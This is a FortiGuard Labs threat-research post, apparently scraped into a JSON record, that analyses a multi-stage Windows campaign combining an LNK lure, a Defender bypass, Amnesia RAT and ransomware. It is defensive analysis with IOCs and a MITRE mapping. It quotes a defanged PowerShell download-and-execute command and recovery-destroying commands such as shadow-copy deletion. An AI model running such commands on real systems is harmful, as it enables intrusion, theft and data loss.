{ "id": "a943a4c2-b86e-495f-b270-4b8ea205c9a4", "created_at": "2026-04-06T00:12:14.61552Z", "updated_at": "2026-04-10T03:37:09.073421Z", "deleted_at": null, "sha1_hash": "77ac3aedd3c7b2af04248a1fa0dadec071c5ebd3", "title": "Inside a Multi-Stage Windows Malware Campaign | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 11330600, "plain_text": "Inside a Multi-Stage Windows Malware Campaign | FortiGuard\r\nLabs\r\nBy Cara Lin\r\nPublished: 2026-01-20 · Archived: 2026-04-05 15:03:21 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Microsoft Windows\r\nImpact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks\r\nSeverity Level: High\r\nBackground\r\nFortiGuard Labs recently identified a multi-stage malware campaign primarily targeting users in Russia. The\r\nattack begins with social engineering lures delivered via business-themed documents crafted to appear routine and\r\nbenign. These documents and accompanying scripts serve as visual distractions, diverting victims to fake tasks or\r\nstatus messages while malicious activity runs silently in the background.\r\nAs the attack chain progresses, it escalates into a full-system compromise that includes security-control bypass,\r\nsurveillance, system restriction, deployment of Amnesia RAT, and ransomware delivery. A defining characteristic\r\nof this campaign is the operational abuse of Defendnot, a research tool originally designed to demonstrate\r\nweaknesses in the Windows Security Center trust model. In this campaign, Defendnot is repurposed to disable\r\nMicrosoft Defender.\r\nThe threat actors further increase resilience by separating payload hosting across multiple public cloud services.\r\nGitHub is primarily used to distribute scripts, while Dropbox hosts binary payloads. This modular hosting\r\napproach allows attackers to update or rotate components independently, complicates takedown efforts, and helps\r\nmalicious traffic blend into legitimate enterprise network activity. This blog details each stage of the attack chain\r\nand the techniques used to sustain and escalate the intrusion.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 1 of 29\n\nFigure 1: Attack chain\r\nInitial Infection Vector and Social Engineering\r\nThe infection chain begins with a compressed archive delivered to the victim. The archive contains multiple decoy\r\ndocuments crafted to resemble legitimate business and accounting materials. These include text files and\r\nspreadsheets with Russian-language filenames referencing routine financial and reporting tasks, reinforcing the\r\nappearance of normal workplace activity.\r\nFigure 2: Archive contents used as social-engineering decoys\r\nThe primary malicious file within the archive is the LNK shortcut\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 2 of 29\n\nЗадание_для_бухгалтера_02отдела.txt.lnk\r\n(Assignment_for_accountant_02department.txt.lnk).\r\nThe filename is intentionally constructed to appear as a standard text document associated with accounting\r\nworkflows, thereby increasing the likelihood of user interaction.\r\nWhen executed, the LNK file launches PowerShell as the initial execution vector using the following parameters:\r\nRelative Path:\r\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nWorking Directory:\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\r\nArguments:\r\n-ExecutionPolicy Bypass -Command \"irm\r\n'hxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira[.]ps1' | iex\"\r\nNo exploit or vulnerability is leveraged at this stage. Instead, the attack relies entirely on user execution, a\r\ntechnique that remains highly effective in enterprise environments where document sharing and archive extraction\r\nare routine. Using an execution policy bypass allows the script to run without local PowerShell policy\r\nenforcement.\r\nOnce launched, the downloaded PowerShell script (kira.ps1) functions as a first-stage loader. Its role is to\r\nestablish initial foothold activity, prepare the system environment, and transition execution to subsequent stages of\r\nthe attack chain.\r\nStage One Loader: PowerShell Script Execution\r\nThe kira.ps1 script does not deliver the final payload. Instead, it performs a series of preparatory actions intended\r\nto conceal malicious execution and reduce user suspicion during the early stages of compromise.\r\nThe script first suppresses visible execution by programmatically hiding the PowerShell console window. This\r\nremoves any immediate visual indicators that a script is running. It then generates a decoy text document in the\r\nuser’s local application data directory. The document contains detailed accounting and reporting instructions\r\nwritten in Russian, closely aligned with the filenames and themes used in the initial archive.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 3 of 29\n\nFigure 3: Creation of decoy text file used for user distraction\r\nOnce written to disk, the decoy document is automatically opened. This reinforces the appearance of a legitimate\r\nbusiness task and keeps the user engaged while malicious activity continues in the background. After establishing\r\nthis distraction, the script sends an execution confirmation to the attacker using the Telegram Bot API. The\r\nmessage includes user-context information, allowing the attacker to verify that the initial stage has been executed\r\nsuccessfully on a live system.\r\nFollowing a deliberate delay of 444 seconds, kira.ps1 retrieves an obfuscated VBScript payload from a GitHub\r\nrepository. The script is executed via Windows Script Host in a hidden window, ensuring that no visible execution\r\nartifacts are created.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 4 of 29\n\nFigure 4: Telegram notification and secondary script deployment\r\nBy offloading all core malicious functionality to externally hosted scripts, kira.ps1 remains lightweight and\r\nmodular. This design allows attackers to update or replace downstream payloads without modifying the initial\r\nloader, while also reducing the static footprint of the first-stage script.\r\nStage Two Orchestrator: Obfuscated VBScript\r\nThe stage-two payload, SCRRC4ryuk.vbe, is written to disk in a fully encoded form generated using Script\r\nEncoder Plus. In its stored state, the file bears no resemblance to readable VBScript. Instead, it begins with a\r\ndense sequence of nonstandard characters and control markers characteristic of Script Encoder Plus output,\r\nfollowed by an embedded encoder banner and seed values.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 5 of 29\n\nFigure 5: Encoded VBScript payload generated by Script Encoder Plus\r\nAfter decoding the outer obfuscation layer, analysis indicates that SCRRC4ryuk.vbe serves as the central\r\norchestrator of the attack chain. Rather than executing a single malicious action directly, the script dynamically\r\nreconstructs the next execution stage entirely in memory.\r\nThe core payload is embedded across multiple string variables, typically labeled Part1 and Part2. These\r\nfragments are concatenated at runtime and passed through a custom decoding routine. The script implements a\r\nlayered decoding process that first applies Base64 decoding and then decrypts the resulting byte stream with RC4.\r\nOnce decrypted, the byte data is converted into Unicode text and executed dynamically using the ExecuteGlobal\r\nfunction.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 6 of 29\n\nFigure 6: Runtime reconstruction and execution of the decoded payload\r\nThis layered design ensures that the final malicious logic is never written to disk in cleartext and only materializes\r\nbriefly during execution. By combining commercial script encoding for the outer layer with custom cryptographic\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 7 of 29\n\nroutines for payload reconstruction, the attacker significantly reduces opportunities for static detection and\r\nsignature-based analysis.\r\nThe following sections break down the internal logic of this VBScript and the subsequent stages it deploys.\r\nFinal Stage: Core Object Initialization and Execution\r\nThe final-stage script begins by explicitly initializing a set of core COM objects, including WScript.Shell,\r\nScripting.FileSystemObject, and WMI providers. These objects are reused throughout the remaining execution\r\nphases and form the foundation for process creation, file operations, and system interrogation.\r\nBefore performing any destructive or persistent actions, the script verifies that it is running with administrative\r\nprivileges. To do so, it attempts to create a batch file named test.bat in the C:\\Windows\\System32\\ directory.\r\nBecause this directory is protected by the operating system, a successful write operation indicates that the process\r\nis executing with elevated rights.\r\nIf file creation fails, the script assumes insufficient privileges and enters a persistent User Account Control (UAC)\r\nescalation loop. During this loop, the script repeatedly relaunches itself via ShellExecute with the runas verb,\r\nprompting the operating system to display a UAC dialog.\r\nTo detect whether elevation privileges have been granted, the script pauses for 3,000 milliseconds between\r\nattempts and queries active processes through WMI, specifically checking for the presence of cmd.exe. The\r\nappearance of a command shell process is treated as a signal that privilege elevation has succeeded. Once\r\ndetected, the script exits the escalation loop and terminates any remaining command shell processes to minimize\r\nvisible artifacts.\r\nIf the initial attempt to write test.bat to the system directory succeeds without error, the script concludes that\r\nadministrative privileges are present. It then writes a confirmation message to the batch file and executes it\r\ndirectly, entirely bypassing the escalation logic.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 8 of 29\n\nFigure 7: Administrative privilege verification and UAC escalation logic\r\nOnce the execution environment is fully prepared, the script transitions into its final operational phase. From this\r\npoint forward, execution is structured around four primary objectives, each implemented through multiple\r\ncomplementary techniques and payloads. These objectives are detailed in the following sections.\r\nPhase 1: Defensive Neutralization and Evasion\r\nThis phase focuses on suppressing visibility into security controls and neutralizing endpoint protection\r\nmechanisms before deploying high-impact payloads.\r\n1. Fake Update Download and Decoy Execution\r\nThe script initiates a decoy execution stage designed to occupy the victim’s attention and simulate legitimate\r\nsystem activity. It first queries running processes via WMI to determine whether a process named install.exe is\r\nalready active. This check prevents redundant execution of the decoy component.\r\nIf no existing instance is detected, the script downloads an executable from a public GitHub repository:\r\nhxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/install[.]exe\r\nand saves it to %PROGRAMDATA%\\install.exe.\r\nThe downloaded file is a .NET-based executable designed solely as a visual decoy. When launched, it displays a\r\nWindows Forms interface titled “Microsoft® Windows Based Script Host,” deliberately mimicking a legitimate\r\nWindows utility. The application uses a fixed-size dialog, centers itself on the screen, and applies an icon extracted\r\nfrom the legitimate wscript.exe binary to reinforce authenticity.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 9 of 29\n\nNo functional logic is executed within this component. While the decoy window remains visible in the\r\nforeground, all malicious activity continues silently in the background.\r\nFigure 8: Fake update executable used as a visual decoy\r\n2. Detection Evasion\r\nAfter deploying the decoy, the script transitions into a dedicated detection-evasion phase that systematically\r\ndisables Microsoft Defender before introducing high-risk payloads.\r\nThe process begins with runtime configuration changes executed through PowerShell. The script explicitly\r\ndisables Microsoft Defender real-time monitoring, preventing on-access scanning of files and processes. To\r\nfurther weaken detection coverage, it adds multiple filesystem exclusions using Defender’s native preference\r\ninterface. These exclusions target directories commonly used for payload staging and execution, including\r\nProgramData, Program Files, Desktop, Downloads, and the system temporary directory.\r\nBy excluding these locations, the script ensures that files written and executed during later stages fall outside\r\nDefender’s scanning scope.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 10 of 29\n\nFigure 9: Modification of Windows Defender scan preferences\r\nThe script then disables additional Defender protection components individually using a sequence of PowerShell\r\ncommands. Each command targets a specific capability, including behavior monitoring, block-at-first-seen\r\nprotection, IOAV scanning, archive scanning, script scanning, removable media scanning, email scanning,\r\nintrusion prevention features, and scheduled catch-up scans. Commands are executed sequentially with short\r\ndelays to prevent partial failures from interrupting the process.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 11 of 29\n\nFigure 10: Sequential disabling of Defender protection features\r\nTo enforce long-term suppression, the script writes multiple policy-controlled registry values under\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender. These entries disable core antivirus and antispyware\r\nfunctionality, including real-time protection, behavior analysis, on-access scanning, archive inspection, and scan-on-enable enforcement. Defender reporting and user experience policies are also modified to suppress notification\r\nprompts, ensuring that the user receives no visible indication that protection has been disabled.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 12 of 29\n\nFigure 11: Registry-based enforcement of Defender suppression\r\n3. Security Control Bypass via Defendnot Deployment\r\nThe script then proceeds to a dedicated security-control bypass stage by deploying Defendnot, a tool that disables\r\nMicrosoft Defender by exploiting the Windows Security Center trust model rather than terminating Defender\r\ncomponents directly.\r\nThe script downloads the Defendnot DLL and loader from GitHub and writes them to\r\n%PROGRAMDATA%\\defendnot.dll and %PROGRAMDATA%\\defendnot-loader.exe.\r\nThe loader injects the Defendnot DLL into the Microsoft-signed, trusted system process Taskmgr.exe by default.\r\nFrom within this trusted execution context, the DLL registers a fake antivirus product with the Windows Security\r\nCenter interface. This registration triggers standard Windows behavior, causing Microsoft Defender to\r\nautomatically disable itself to avoid conflicts with the newly registered antivirus.\r\nThis technique exploits trust assumptions embedded in the Windows Security Center design, where antivirus\r\nproducts registered through approved interfaces are treated as authoritative.\r\nFigure 12: The download and deployment of Defendnot components\r\nPhase 2: Environment Reconnaissance and Surveillance\r\nFollowing defensive neutralization, the attack transitions into environment reconnaissance and active user\r\nsurveillance.\r\n1. System Information Collection and Telegram Exfiltration\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 13 of 29\n\nAfter privilege enforcement and environment preparation are complete, the script enters a dedicated phase for\r\ncollecting system information. The explicit objective of this stage is to gather detailed host, hardware, user,\r\nnetwork, and security-related information and transmit it to the attacker via the Telegram Bot API.\r\nCollected data includes system identifiers, user context, domain membership, and other environment attributes\r\nrelevant for profiling the compromised host and guiding subsequent attacker actions. Once assembled, the data is\r\ntransmitted directly to the attacker-controlled Telegram bot endpoint, providing near-real-time confirmation of\r\nsuccessful compromise and situational awareness of the victim’s environment.\r\nFigure 13: Transmission of collected system information via Telegram\r\n2. User Activity Surveillance via Screenshot Capture\r\nAfter completing detection-evasion measures, the attack initiates active visual monitoring of user activity over a\r\nfixed observation window. The script retrieves an additional payload from the same GitHub repository,\r\nhxxps://github[.]com/Mafin111/MafinREP111/raw/refs/heads/main/TelegramWorker[.]scr, and writes it to\r\n%PROGRAMDATA%\\TelegramWorker.scr.\r\nUsing the .scr extension causes Windows to treat the file as a screen saver executable, reducing user suspicion\r\nduring execution. Despite the extension, TelegramWorker.scr is a .NET-based executable that functions as a\r\ndedicated surveillance module.\r\nUpon execution, the module retrieves its own process name and queries the system for other running instances\r\nwith the same name. If more than one instance is detected, execution terminates immediately. This single-instance\r\nenforcement prevents redundant execution and avoids overlapping screenshot capture.\r\nThe module then enters a capture loop with a limit of 30 iterations. During each iteration, it constructs a local file\r\npath using a predefined directory and sequential filenames (for example, 1.png, 2.png). The current screen\r\ncontents are captured and written to disk at the generated path. Each image is then transmitted to the attacker via\r\nthe Telegram Bot API, enabling near real-time observation of user activity.\r\nA fixed delay of thirty seconds is enforced between captures, resulting in a total surveillance window of\r\napproximately fifteen minutes.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 14 of 29\n\nFigure 14: Screenshot capture and exfiltration component\r\nPhase 3: System Lockdown and Response Suppression\r\nTo prevent remediation, investigation, or recovery, the malware transitions into a comprehensive system lockdown\r\nphase that strips the victim of administrative control and recovery options.\r\n1. System Tool Restriction and Recovery Destruction\r\nThe script disables a broad set of Windows administrative and diagnostic tools by modifying registry-based policy\r\ncontrols rather than terminating services or altering binaries. This approach leverages native Windows policy\r\nenforcement mechanisms, ensuring changes take effect immediately and persist across sessions.\r\nUser-facing tools explicitly disabled include:\r\nRegistry Editor, preventing inspection or reversal of registry-based persistence and policy changes\r\nTask Manager, blocking process visibility and termination\r\nRun dialog, restricting command execution\r\nFolder Options, preventing access to hidden files and file extensions\r\nSystem Settings and Control Panel, blocking access to core configuration interfaces\r\nSystem configuration utilities (for example, msconfig), preventing inspection of startup behavior,\r\nservices, and boot options\r\nSystem properties and context menus, limiting access to system-level dialogs and right-click\r\nadministrative shortcuts\r\nLegacy execution pathways, reducing alternative diagnostic or recovery options\r\nAll policy values are written under\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\\r\nBy targeting the current user hive, the restrictions apply immediately without requiring system-wide policy\r\ndeployment. After writing the registry values, the script forces policy application by executing gpupdate /force,\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 15 of 29\n\nensuring the changes take effect without waiting for the next refresh cycle.\r\nWith administrative access effectively disabled, the script then disables system recovery mechanisms. It first\r\ndisables the Windows Recovery Environment using reagentc /disable, preventing access to boot-time repair and\r\nreset options. It then deletes the Windows Backup catalog using wbadmin delete catalog -quiet, rendering\r\nexisting backup references unusable. Finally, all Volume Shadow Copy Service snapshots are removed using\r\nvssadmin delete shadows /all /quiet, permanently eliminating restore points and file version history.\r\nAll recovery-disabling commands are executed silently through cmd.exe, suppressing output to avoid alerting the\r\nuser.\r\nFigure 15: Registry-based restriction of system administration tools\r\n2. File Association Hijacking and Execution Control\r\nIn the final stage of the attack chain, the malware implements an extensive file association hijacking mechanism to\r\nprevent the victim from launching applications or opening common file types. Rather than deleting files or\r\nterminating processes, the script exploits Windows file association behavior in the registry to intercept execution\r\nattempts.\r\nThe script defines a comprehensive list of file extensions, including executable, document, archive, image, media,\r\nscript, installer, and configuration formats. For each extension, it overwrites the default open command under the\r\nHKCR registry hive. Instead of invoking the associated application, opening these files launches a command shell\r\nthat displays a message instructing the victim to contact the attacker via Telegram.\r\nThis approach disables application execution without modifying or corrupting the underlying files. From the\r\nuser’s perspective, files appear intact but are functionally unusable, reinforcing the perception of complete system\r\ncompromise.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 16 of 29\n\nFigure 16: Registry-based blocking of application and document execution\r\nWhile broadly restricting execution, the script explicitly preserves functionality for malicious script formats. File\r\nassociations for .vbs (VBScript) and .scr (Screen Saver) files are deliberately configured to ensure reliable\r\nexecution. The registry mappings explicitly bind .vbs files to WScript.exe or CScript.exe, preventing accidental\r\nopening in text editors or interference from default security associations.\r\nThe .scr extension, which is functionally equivalent to .exe, is configured with an “%1 /S” execution command to\r\nensure it runs as an executable. To immediately apply all association changes, the script runs regsvr32 /s /i\r\nshell32.dll, which forces the Windows Shell to refresh its configuration without requiring a reboot.\r\nThis guarantees that any subsequently deployed payloads execute immediately when accessed, while legitimate\r\nuser workflows remain blocked.\r\nFigure 17: File association manipulation to enforce execution control\r\nPhase 4: Final Payload Impact\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 17 of 29\n\nWith security controls disabled, surveillance established, and recovery mechanisms removed, the malware deploys\r\nits final payloads. This phase combines persistent remote access, large-scale data theft, ransomware encryption,\r\nand full system lockout to maximize operational impact and coercive leverage.\r\n1. Amnesia RAT Deployment\r\nThe VBScript deploys a Remote Access Trojan as its primary long-term control and data-exfiltration component.\r\nThis payload is hosted on Dropbox rather than GitHub and is downloaded with the deceptive filename\r\n“svchost.scr”. The file is copied to %PROGRAMDATA% and the user’s Startup folder, and persistence is\r\nestablished via a registry entry under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nFigure 18: Deployment of the RAT payload\r\nStatic analysis shows that svchost.scr is a 64-bit PE executable compiled with Microsoft Visual C++ and\r\npackaged using PyInstaller. Unpacking reveals multiple potential entry points, including a compiled Python\r\nmodule named amnesiarat1.pyc, indicating that the core functionality is implemented as an obfuscated Python-based Amnesia RAT.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 18 of 29\n\nFigure 19: Partial strings extracted from svchost.scr\r\nAmnesia RAT is designed for broad, multi-category data theft combined with real-time surveillance and system\r\ncontrol. Its capabilities include:\r\nBrowser credentials and session data: The RAT targets Chromium-based browsers, including Chrome, Edge,\r\nChromium, Brave, Opera, Opera GX, Vivaldi, and Yandex. It extracts saved passwords, cookies, session tokens,\r\nbrowsing history, download records, and autofill data. Encrypted credentials are decrypted by retrieving the\r\nbrowser master key from the Local State file and invoking Windows DPAPI to recover plaintext secrets.\r\nTelegram Desktop session hijacking: The malware explicitly targets Telegram Desktop by stealing local session\r\nartifacts from the tdata directory, including authentication keys, session files, configuration data, and account\r\nmetadata. These artifacts enable full account takeover without credentials or two-factor authentication.\r\nSeed phrase discovery and clipboard monitoring: The RAT recursively scans accessible drives for text files\r\ncontaining any of the 2,048 BIP-39 seed words. In parallel, it monitors clipboard contents in real time to intercept\r\n12-, 18-, or 24-word recovery phrases.\r\nDiscord and Steam data theft: The RAT searches for Discord authentication tokens stored by both standalone\r\napplications and browsers, parsing LevelDB and Local Storage files using regex patterns applied to .log and .ldb\r\nfiles. It also targets Steam configuration files and ssfn authentication files.\r\nCryptocurrency wallets and financial assets: Hard-coded checks target specific browser extensions associated\r\nwith MetaMask as well as desktop wallets including Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum,\r\nAtomic Wallet, Guarda, and Coinomi.\r\nSystem and hardware intelligence: The RAT collects detailed host profiling data, including operating system\r\nversion, username, domain, CPU model, RAM capacity, GPU model, BIOS version, motherboard identifier, disk\r\ncapacity, and local and external IP addresses. This data supports victim fingerprinting and prioritization.\r\nScreen, audio, and activity surveillance: Supported surveillance features include screenshot capture, webcam\r\nimage capture, microphone audio recording, clipboard monitoring, and active window title enumeration. Collected\r\nartifacts are staged in C:\\ProgramData before compression and exfiltration.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 19 of 29\n\nProcess and system control: The RAT enables full remote interaction, including process enumeration and\r\ntermination, shell command execution, arbitrary payload deployment, and execution of additional malware.\r\nPersistence: Persistence is reinforced through registry autorun entries, often using benign-sounding names such\r\nas chromeupdate to evade casual inspection.\r\nExfiltration channels: Exfiltration is primarily performed over HTTPS using Telegram Bot APIs. Larger datasets\r\nmay be uploaded to third-party file-hosting services such as GoFile, with download links relayed to the attacker\r\nvia Telegram. This design eliminates the need for attacker-controlled infrastructure.\r\nBy combining credential theft, session hijacking, financial targeting, and real-time surveillance, Amnesia RAT\r\nenables full account takeover, identity abuse, and follow-on compromise campaigns.\r\nFigure 20: Amnesia RAT public-facing reference site\r\n2. Ransomware Deployment\r\nFollowing RAT deployment, the script downloads and executes an additional payload, WmiPrvSE.scr, from a\r\nremote GitHub repository. Execution is gated by an administrative privilege check and launched in a hidden\r\nwindow via PowerShell. Persistence is reinforced by copying the payload into the Startup folder.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 20 of 29\n\nFigure 21: Deployment of the ransomware payload\r\nThe WmiPrvSE.scr payload represents the ransomware stage and is derived from the Hakuna Matata\r\nransomware family. Once executed, it performs large-scale encryption across the system, targeting hundreds of\r\nfile extensions spanning documents, archives, images, media, source code, and application assets.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 21 of 29\n\nFigure 22: Hakuna Matata ransomware execution\r\nEncrypted files are renamed with the custom extension @NeverMind12F. The ransomware drops a ransom note\r\nnamed ЧИТАЙМЕНЯ.txt into affected directories and replaces the desktop wallpaper with a ransom image\r\ngenerated on the fly. To increase impact, it terminates processes associated with databases, office software, email\r\nclients, virtualization platforms, and security tools before rescanning and encrypting remaining files.\r\nFigure 23: Targeted process termination and encryption\r\nThe ransomware maintains a continuous execution loop that actively monitors and hijacks clipboard contents,\r\nreplacing cryptocurrency wallet addresses with attacker-controlled values. Combined with encryption, lockout\r\nmechanisms, and coercive visual messaging, these behaviors demonstrate an attack model built for maximum\r\nleverage, sustained control, and financial extraction.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 22 of 29\n\nFigure 24: ClipBanker functionality in Hakuna Matata ransomware\r\nFigure 25: Ransomware wallpaper payload\r\n3. WinLocker Deployment\r\nIn parallel, the script deploys a WinLocker component designed to fully restrict user interaction. The payload is\r\ndownloaded from GitHub and saved as %PROGRAMDATA%\\gedion.scr. As with prior stages, execution requires\r\nadministrative privileges and is launched in a hidden window.\r\nOnce executed, the WinLocker creates a mutex named WINLOCKBYAMPBYAMPBYAMPfsdjf and enforces a\r\nfull desktop lock, preventing normal system access. Victim-facing messages are embedded as Base64-encoded\r\nstrings and decoded at runtime. These messages, written in Russian, instruct the victim to contact the attacker via\r\nTelegram within a two-hour deadline.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 23 of 29\n\nThis lightweight obfuscation reduces static detection while ensuring consistent messaging across the ransomware\r\nnotes, the WinLocker interface, wallpaper overlays, and file-association hijacking routines.\r\nFigure 26: WinLocker interface enforcing system lockout\r\nConclusion\r\nThis attack chain demonstrates how modern malware campaigns can achieve full system compromise without\r\nexploiting software vulnerabilities. Instead, the threat actor relies on social engineering, widely trusted platforms\r\nsuch as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and\r\nexecute payloads while blending into normal enterprise traffic.\r\nBy systematically abusing native Windows features, administrative tools, and policy enforcement mechanisms, the\r\nattacker disables endpoint defenses before deploying persistent surveillance tooling and destructive payloads. The\r\noperational use of Defendnot highlights how publicly disclosed defensive research can be repurposed into active\r\nattack workflows by exploiting trust assumptions embedded within the Windows Security Center. In parallel,\r\ndeploying Amnesia RAT enables long-term reconnaissance, credential theft, and interactive system control, while\r\nsubsequent ransomware and WinLocker components enforce data denial and apply sustained psychological\r\npressure on the victim.\r\nThis campaign underscores the importance of monitoring for anomalous security configuration changes,\r\nunexpected persistence mechanisms, and abuse of legitimate cloud services. Early detection of these behaviors is\r\ncritical, as once defensive controls are neutralized and recovery mechanisms are removed, remediation options\r\nbecome severely constrained and impact escalates rapidly.\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 24 of 29\n\nFortinet Protections\r\nThe malware described in this report is detected and blocked by FortiGuard Antivirus as:\r\nLNK/Agent.LAZH!tr\r\nPowerShell/Agent.OQB!tr\r\nW64/NoDefender.E!tr\r\nMSIL/Agent.FLS!tr\r\nW32/LockScreen.BVN!tr\r\nMSIL/Filecoder.BBY!tr.ransom\r\nW64/Agent.5E79!tr\r\nThe FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR.\r\nCustomers running these products with up-to-date signatures are protected against the malware components\r\ndescribed in this report.\r\nFortiMail detects the initial phishing emails as virus detected. In addition, real-time anti-phishing protection\r\nprovided by FortiSandbox, embedded across Fortinet’s FortiMail, web filtering, and antivirus solutions, enables\r\nadvanced detection of both known and unknown phishing attempts. The FortiPhish phishing simulation service\r\nfurther supports user resilience by actively training and testing end users against real-world phishing techniques,\r\nincluding impersonation, Business Email Compromise (BEC), and ransomware delivery.\r\nThe FortiGuard CDR (Content Disarm and Reconstruction) service, available on both FortiGate and FortiMail,\r\ncan neutralize malicious content embedded in documents by removing active code while preserving document\r\nusability.\r\nThe FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with\r\nthis campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT\r\ncollaborations, MITRE, trusted industry partners, and other intelligence sources.\r\nOrganizations seeking to strengthen foundational security awareness may also consider completing Fortinet\r\nCertified Fundamentals (FCF) training in Cybersecurity.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, contact our Global\r\nFortiGuard Incident Response Team for assistance.\r\nIOCs\r\nURLs\r\nhxxps://github[.]com/Mafin111/MafinREP111\r\nhxxps://dl.dropboxusercontent.com/scl/fi/fvugw0l9x7ty665esaul3/svchost.scr?\r\nrlkey=urzegysuk9bkrw2b8zmx31457\u0026st=gbhmc2su\r\nLNK\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 25 of 29\n\n7b8cf0ef390a7d6126c5e7bf835af5c5ce32c70c0d58ca4ddc9c238b2d3f059a\r\nScripts\r\n1828614be6d9bdd92f7ee30e12c8aac8eba33a6df2c92995f9bf930c3f1b992b\r\n3aa6ebb73390d304eef8fd897994906c05f3e967f8f6f6a7904c6156cf8819f9\r\n263b5ba921e478215dc9e3a397157badab415fc775cfb4681821b7446c14fb1a\r\n5443232a367a83ac2899b37c066dae3ec2010df292291db24ce3d744133218a6\r\nPayloads\r\n359fe8df31c903153667fbe93795929ad6172540b3ee7f9eff4bcc1da6d08478\r\n6222775b877b4be4f5407525d52c5889739b96c302e5a204ef369b4a51c6dab2\r\n71069a5d2a80a047ca36ca82e630d353829726d4f03a74c7522b7700c5c2bb59\r\n45e942ba59f3876b263a03ed7e5d5b1b250e84a0a4b4093b3c13b5fca4e12b21\r\ne6ca6bab85ae1eff08a59b46b7905ae0568110da172dec8367f32779094bdd08\r\n7de56603a7b41fca9313231df6105dbb8148d3b0d80dfbc00e71e1d88f871915\r\nMITRE ATT\u0026CK Mapping\r\nMITRE ATT\u0026CK techniques observed in this campaign map to the following:\r\nTactic\r\nTechnique\r\nID\r\nTechnique\r\nName\r\nObserved Behavior in This Campaign\r\nInitial\r\nAccess\r\nT1566.001\r\nPhishing:\r\nAttachment\r\nDelivery of malicious LNK and decoy documents inside a\r\ncompressed archive masquerading as business files\r\nExecution T1059.001\r\nCommand and\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nPowerShell executed via LNK to download and execute\r\nstaged payloads\r\nExecution T1059.005\r\nCommand and\r\nScripting\r\nInterpreter:\r\nVBScript\r\nObfuscated VBScript used as an orchestration layer and\r\nloader\r\nhttps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign\r\nPage 26 of 29\n\nDefense\r\nEvasion\r\nT1562.001\r\nImpair\r\nDefenses:\r\nDisable or\r\nModify Tools\r\nSystematic disabling of Microsoft Defender features via\r\nPowerShell and registry policy\r\nDefense\r\nEvasion\r\nT1562.004\r\nImpair\r\nDefenses:\r\nDisable or\r\nModify\r\nSystem\r\nFirewall / AV\r\nAbuse of Defendnot to disable Defender by registering a\r\nfake antivirus\r\nDefense\r\nEvasion\r\nT1027\r\nObfuscated /\r\nEncrypted\r\nFiles or\r\nInformation\r\nScript Encoder Plus, Base64, and RC4 used to conceal\r\npayload logic\r\nDefense\r\nEvasion\r\nT1218\r\nSigned Binary\r\nProxy\r\nExecution\r\nInjection of Defendnot into trusted Microsoft-signed\r\nprocess (Taskmgr.exe)\r\nPrivilege\r\nEscalation\r\nT1548.002\r\nAbuse\r\nElevation\r\nControl\r\nMechanism:\r\nBypass UAC\r\nRepeated ShellExecute “runas” invocation to force 